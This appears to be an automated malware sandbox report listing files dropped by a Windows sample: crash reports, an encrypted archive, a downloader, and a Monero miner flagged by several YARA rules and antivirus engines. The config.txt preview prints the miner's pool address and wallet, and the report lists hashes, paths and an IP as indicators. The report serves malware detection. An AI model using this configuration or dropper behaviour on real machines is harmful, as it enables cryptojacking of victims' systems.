                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.2.4.<./.P.i.d.>.......

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7979.tmp.xml

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4712
                                                                  Entropy (8bit):4.425790862498831
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwSD8zsutJgtBI9VjZWgc8sqYjn8fm8M4J+JFAkyq8vOuKcQIcQQhTd:uITfuHbjogrsqYgJnkWRKkQhTd
                                                                  MD5:4A66050E039C64C0D1D0768441FF687B
                                                                  SHA1:F3E3E5D9C704ED72D42DD580F1D29905990BADF9
                                                                  SHA-256:9D0BC0EB10E63F747E066F65B46AB8056F449C358C4AC3653698EBC21B78CE7D
                                                                  SHA-512:B89174D12728EA6DFC1A19C16FDF903B8AC6460EDC67EBFB70D1C73143ACDA172F41E0D297678DF48D58B8DC177FE2DEE2C910E87AC24AA8F650E6AFAEE34CC9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1603930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DBD.tmp.dmp

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Jul 15 10:59:30 2022, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):206570
                                                                  Entropy (8bit):1.6007728475005096
                                                                  Encrypted:false
                                                                  SSDEEP:384:pzpcGhtLIGn7/ey+5Km8OIWv7mMSsCmgwKN5xIUvDmI+2uk4XeQ6VBnYYIDrN5Rc:p5htMGn7/Mphd741QmxI/JXAV
                                                                  MD5:D76D9D0F0A2104FA8CFCAF2CDA21690F
                                                                  SHA1:FD2CA470FCE4E9B04AF5075E0D97670925AB9265
                                                                  SHA-256:159BF4A558FA481F2D0EFCCF8D8D66F0C02D42E5180B6EDF2E3D549FBF25285F
                                                                  SHA-512:9E9D09B35D9887F61F6071D97FD5826C55A3FD144C2D53F5599953D421CDE9FE8C52DD7E0A2977B5DFF22E94DDE141CB511A65369EE58FC228806C3BACCD6149
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:MDMP....... ........H.b............t.......................T...X(......$....w..........`.......8...........T...........0b...............(...........*...................................................................U...........B......0+......Lw.....................T.......\...@H.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FDE.tmp.WERInternalMetadata.xml

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8870
                                                                  Entropy (8bit):3.7032447692520023
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNil/hzB06YfdDrxxBgmfDSBgkCpDi89bcdffy0m:RrlsNiL906Y1DrXBgmfDSUcFfQ
                                                                  MD5:724DA247BB9719932538B353B199545C
                                                                  SHA1:A165F5CE209DAF65D56CDE5DE29A100D4588D188
                                                                  SHA-256:FFA153A2C89ECDD74520A4B2D3D50A838B3EEA51A57FCF7FE8B63CA964048E4A
                                                                  SHA-512:F7CBFF14422FCFBE50EB6B1CBDB106A820211B3049C9386EFE272397DF5030933E1512D5FA272EEDE17D20C953DBFA01AFEA49DB5CB9A1B8559907410A8D4C59
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.d.>.......

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9464.tmp.xml

                                                                  Download File
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4740
                                                                  Entropy (8bit):4.465888803907197
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwSD8zsutJgtBI9VjZWgc8sqYjh8fm8M4JqJFhxR1yq8vqd93CGydd:uITfuHbjogrsqY6J2X1WSdhydd
                                                                  MD5:4775695B5D58A790BAB90C55D2B95AC8
                                                                  SHA1:16634B54C99A7A9B11615A400E05C126056F594C
                                                                  SHA-256:97DFA008B63BA6804DB5816E04CD5C7C04D796A68713E9DD7691209E94853B04
                                                                  SHA-512:0A9DBAAEE31FC8321C4E8473797E37FB844C208BFBD231BAFFEFF5B5800DC9916F2BADCD8D082E5AD046DF21023FD3327C0A311B113358BFB6FA447E0F7DD807
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1603930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                  C:\ProgramData\Systemd\CPU.zip

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                  Category:modified
                                                                  Size (bytes):3420282
                                                                  Entropy (8bit):7.999941112884821
                                                                  Encrypted:true
                                                                  SSDEEP:49152:wfarUaYfUL9zf1epruEZN1/ZhpydYX0o4etCz9kbtoMeFlM6uZji8KKbtXXc:wi9YfULNdgruEBZhpy9atCeLY+mi1c
                                                                  MD5:60E8A0A1934A8DF1E218BBD6F4893561
                                                                  SHA1:9F7472C1F3B9B906947BDBB0291C9011D7C3879D
                                                                  SHA-256:2B571A2AF712E0A65C599173D8A26EAC22F3DD934AAC650F20F44060AA8783FE
                                                                  SHA-512:E923163009D113B8653D61A53C23535CDB1F9FB8085083CFDD56751EBA6F0E00203390A1C81A4E9EB797746FB57CD4CA07FA6F9E9FBC65B387CCB3DEB509993D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:PK......c....T.P..............config.txt......AE....?.E....1LSe.P._1......6.`...)..'...5........c....u(Mw..M..;..4..!..<pCW..l.d...8....mg..L.J...,AyW...#..%n......4...B.B........th.............oh....v.*..2PK...P..........PK......c....T_....,4...~.....mvsc32.exe......AE.....:{.).4]h.I......4..A.;mY..w......fR. g.7.....0..ON..kb...;.@y)......7...4.."*...".z#8..RJ....7....'}...D...]....f.,2.........F...3..].j.}..+....O.......... .2....[..(.MR......(...C.9.Y].6)...u@E..."...FF..c.sd..8JE.......j(I..a....(........\...?<l...glI......`..ty......M...bB=....X.....,.$..&k5...g.<.<..dO=,ca.r.n...3...7;.U.i"RF7,.\v....]Z.....q.g.o...[.V-.0.{'..h4;k......T.y........W..R..........}.c...T$....#..Y..hR..(..~...P.}....?...4p.U."8@x5^..F.i..x..ydB...*....7....."~#.=b."...P....'w.<.Iu..?..Sr.0.gb..+V...X.].-{...T1`.=..d.W...#sM.L.....G..O..3o.$K..W.X.....,..P.....(Q........*...cc.L....-{m.......eJ../...70.3....L65/;n...?k..... R..@?E?*......J..o.}\N.X.)4..V..33.

                                                                  C:\ProgramData\Systemd\config.txt

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):140
                                                                  Entropy (8bit):5.550382395906799
                                                                  Encrypted:false
                                                                  SSDEEP:3:07ghKTEQfhX0dcY0IiHJU2TDm+bEdCAYKm3TJXwNVb:+T5fhXvZfpvTDclDm3TJXit
                                                                  MD5:A4B030E13F5CA33E9AC4A2228303BBA0
                                                                  SHA1:02013A641E810145837F1101CF1CE10F40E1521A
                                                                  SHA-256:940C7080E674B912D3968B2850D1F01E7FD8C9294558280C9F848C60FC097A40
                                                                  SHA-512:3A0108531A46F564AC87E341B5AC3806AAB7FBA38E184C015FB9599299F697625A51730217F004368957EA9AE5716DEB491ADD3CD2F0AB2DC1DB016B011AAE08
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x

                                                                  C:\ProgramData\Systemd\mvsc32.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8295936
                                                                  Entropy (8bit):6.6357162370352025
                                                                  Encrypted:false
                                                                  SSDEEP:98304:VeSdMeEZvlEVuaMYPShvXAaiW5DjocFtZLj2XMSpZVqWyOmsqndFt3BQgEBHQ+zJ:oflEiI9Wt3YLkqpnmNK/ysxfWdIjF
                                                                  MD5:EAB270D7108D82EE602CE25C64A5740F
                                                                  SHA1:FE5C22D4626BE4384AD6DE4BC09F6A7546B525C3
                                                                  SHA-256:C8041C0C1E06CAC533162D4159403FC3E295EAB4A368519DAB658A75887E747D
                                                                  SHA-512:50BE55433CC45B21278BAA72066681017A860F8C67A0FC4DE1725887075556B8E2F817A77A9485F14B7D769ABEDA39862D558DE5B8487260A9D43DEFB2BD7037
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\ProgramData\Systemd\mvsc32.exe, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\Systemd\mvsc32.exe, Author: Joe Security
                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\ProgramData\Systemd\mvsc32.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 71%, Browse
                                                                  • Antivirus: Metadefender, Detection: 31%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 69%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ZLb...............&.._...~...2............@...................................*.~...`... .................................................E...P........w..............`.............................. .u.(...................................................text....._......._.................`..`.data...`....._......._.............@....rdata.. I....`..J....`.............@..@.pdata........w.......w.............@..@.xdata.......z.......y.............@..@.bss....`.2...}..........................idata...E......F....}.............@....CRT....h....0........}.............@....tls.........@........}.............@....rsrc........P........}.............@....reloc.......`........~.............@..B........................................................................................................................................................................

                                                                  C:\ProgramData\Systemd\name.txt

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):10
                                                                  Entropy (8bit):3.121928094887362
                                                                  Encrypted:false
                                                                  SSDEEP:3:ugkC:uNC
                                                                  MD5:0FB961B9DC041D1A1700378310E46DD8
                                                                  SHA1:4019DAF6F35BA95704A7E0914BF75401BA9C0FBF
                                                                  SHA-256:9CA93D4AE2B5259BBA4EC436035C42653CA8BEED5DB7C2085A29C0A42E3B8871
                                                                  SHA-512:3C7D621404EC47A6785706AE7CFE218D0E981FD887ED42F35384BD7F4FE41046752F568F9AC6EC95048A6DF4FFBC2EA45FB8847E32763DEE142C063341A12CB0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:mvsc32.exe

                                                                  C:\ProgramData\Systemd\old.exe (copy)

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8295936
                                                                  Entropy (8bit):6.6357162370352025
                                                                  Encrypted:false
                                                                  SSDEEP:98304:VeSdMeEZvlEVuaMYPShvXAaiW5DjocFtZLj2XMSpZVqWyOmsqndFt3BQgEBHQ+zJ:oflEiI9Wt3YLkqpnmNK/ysxfWdIjF
                                                                  MD5:EAB270D7108D82EE602CE25C64A5740F
                                                                  SHA1:FE5C22D4626BE4384AD6DE4BC09F6A7546B525C3
                                                                  SHA-256:C8041C0C1E06CAC533162D4159403FC3E295EAB4A368519DAB658A75887E747D
                                                                  SHA-512:50BE55433CC45B21278BAA72066681017A860F8C67A0FC4DE1725887075556B8E2F817A77A9485F14B7D769ABEDA39862D558DE5B8487260A9D43DEFB2BD7037
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 71%, Browse
                                                                  • Antivirus: Metadefender, Detection: 31%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 69%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ZLb...............&.._...~...2............@...................................*.~...`... .................................................E...P........w..............`.............................. .u.(...................................................text....._......._.................`..`.data...`....._......._.............@....rdata.. I....`..J....`.............@..@.pdata........w.......w.............@..@.xdata.......z.......y.............@..@.bss....`.2...}..........................idata...E......F....}.............@....CRT....h....0........}.............@....tls.........@........}.............@....rsrc........P........}.............@....reloc.......`........~.............@..B........................................................................................................................................................................

                                                                  C:\ProgramData\UpSys.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):945944
                                                                  Entropy (8bit):6.654096172451499
                                                                  Encrypted:false
                                                                  SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                                  MD5:EFE5769E37BA37CF4607CB9918639932
                                                                  SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                                                  SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                                  SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 5%, Browse
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\check.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\UpSys[1].exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):945944
                                                                  Entropy (8bit):6.654096172451499
                                                                  Encrypted:false
                                                                  SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                                  MD5:EFE5769E37BA37CF4607CB9918639932
                                                                  SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                                                  SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                                  SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\3TBXGQBF.txt

                                                                  Download File
                                                                  Process:C:\ProgramData\MicrosoftNetwork\System.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):11
                                                                  Entropy (8bit):2.663532754804255
                                                                  Encrypted:false
                                                                  SSDEEP:3:HLL/:f/
                                                                  MD5:1FA0C9A1FD37B32E8589AE08F10FB489
                                                                  SHA1:94659B5609BEBE23FA6EB5336AE6CA15DBD1C544
                                                                  SHA-256:856921BE83A45D94C724323EFD0AD2CBBF5BF23C83DD45D3B6D8474B02F7C16C
                                                                  SHA-512:A226D1C502E78F0DDC5B35BF42049462C5666E710B50CB92FCE3A47ADFD77DFC4C1DB689BE2995EDB03A07741C3450E1B15905BB2F10D9B8904886AAE6C83720
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:84.17.52.14

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\9DRWB5QP.txt

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):11
                                                                  Entropy (8bit):2.663532754804255
                                                                  Encrypted:false
                                                                  SSDEEP:3:HLL/:f/
                                                                  MD5:1FA0C9A1FD37B32E8589AE08F10FB489
                                                                  SHA1:94659B5609BEBE23FA6EB5336AE6CA15DBD1C544
                                                                  SHA-256:856921BE83A45D94C724323EFD0AD2CBBF5BF23C83DD45D3B6D8474B02F7C16C
                                                                  SHA-512:A226D1C502E78F0DDC5B35BF42049462C5666E710B50CB92FCE3A47ADFD77DFC4C1DB689BE2995EDB03A07741C3450E1B15905BB2F10D9B8904886AAE6C83720
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:84.17.52.14

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\CPU[1].zip

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                  Category:dropped
                                                                  Size (bytes):3420282
                                                                  Entropy (8bit):7.999941112884821
                                                                  Encrypted:true
                                                                  SSDEEP:49152:wfarUaYfUL9zf1epruEZN1/ZhpydYX0o4etCz9kbtoMeFlM6uZji8KKbtXXc:wi9YfULNdgruEBZhpy9atCeLY+mi1c
                                                                  MD5:60E8A0A1934A8DF1E218BBD6F4893561
                                                                  SHA1:9F7472C1F3B9B906947BDBB0291C9011D7C3879D
                                                                  SHA-256:2B571A2AF712E0A65C599173D8A26EAC22F3DD934AAC650F20F44060AA8783FE
                                                                  SHA-512:E923163009D113B8653D61A53C23535CDB1F9FB8085083CFDD56751EBA6F0E00203390A1C81A4E9EB797746FB57CD4CA07FA6F9E9FBC65B387CCB3DEB509993D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:PK......c....T.P..............config.txt......AE....?.E....1LSe.P._1......6.`...)..'...5........c....u(Mw..M..;..4..!..<pCW..l.d...8....mg..L.J...,AyW...#..%n......4...B.B........th.............oh....v.*..2PK...P..........PK......c....T_....,4...~.....mvsc32.exe......AE.....:{.).4]h.I......4..A.;mY..w......fR. g.7.....0..ON..kb...;.@y)......7...4.."*...".z#8..RJ....7....'}...D...]....f.,2.........F...3..].j.}..+....O.......... .2....[..(.MR......(...C.9.Y].6)...u@E..."...FF..c.sd..8JE.......j(I..a....(........\...?<l...glI......`..ty......M...bB=....X.....,.$..&k5...g.<.<..dO=,ca.r.n...3...7;.U.i"RF7,.\v....]Z.....q.g.o...[.V-.0.{'..h4;k......T.y........W..R..........}.c...T$....#..Y..hR..(..~...P.}....?...4p.U."8@x5^..F.i..x..ydB...*....7....."~#.=b."...P....'w.<.Iu..?..Sr.0.gb..+V...X.].-{...T1`.=..d.W...#sM.L.....G..O..3o.$K..W.X.....,..P.....(Q........*...cc.L....-{m.......eJ../...70.3....L65/;n...?k..... R..@?E?*......J..o.}\N.X.)4..V..33.

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):26143
                                                                  Entropy (8bit):5.0561629531069086
                                                                  Encrypted:false
                                                                  SSDEEP:768:h4SinHzwINKevH3ctAHkfcYHWrxT4JCw6opbjoRjdvRB+ard3Lvx:h4SinHzwINKe0tAHkfcsWrxT4JCw6ibo
                                                                  MD5:EAC422EBD772228845FE9EB2AEADE3FC
                                                                  SHA1:C62B79780147F038775A95C8B29C28187839C84C
                                                                  SHA-256:F1AC9AAADB2DE51BA8E3EFFDFAA2677D081C78E32746AB57BC8AC55FB829992E
                                                                  SHA-512:848378861CCCADF02BB4C0ECDFBA5801042C69AE163688FC5ACB2445C2362BC9FEFE28B7E690E933CDA840D4B8FC04A632BFBE9BF8035E90B3DA4B8EDEE87517
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:PSMODULECACHE.*...9......I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1........Remove-MpPreference........Get-MpThreatDetection........Get-MpComputerStatus........Update-MpSignature........Get-MpThreatCatalog........Start-MpWDOScan........Add-MpPreference........Get-MpPreference........Remove-MpThreat........Get-MpThreat........Set-MpPreference........Start-MpScan........x..:...s...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1........Test-FileCatalog........Set-AuthenticodeSignature........Get-ExecutionPolicy........Set-Acl........Protect-CmsMessage........Get-Credential........ConvertTo-SecureString........Get-Acl........Get-PfxCertificate........Get-AuthenticodeSignature........ConvertFrom-SecureString........Unprotect-CmsMessage........New-FileCatalog........Get-CmsMessage........Set-ExecutionPolicy.........P.e...I...C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSRead

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.9260988789684415
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                  MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                  SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                  SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                  SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:@...e................................................@..........

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uznq0lz.ers.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
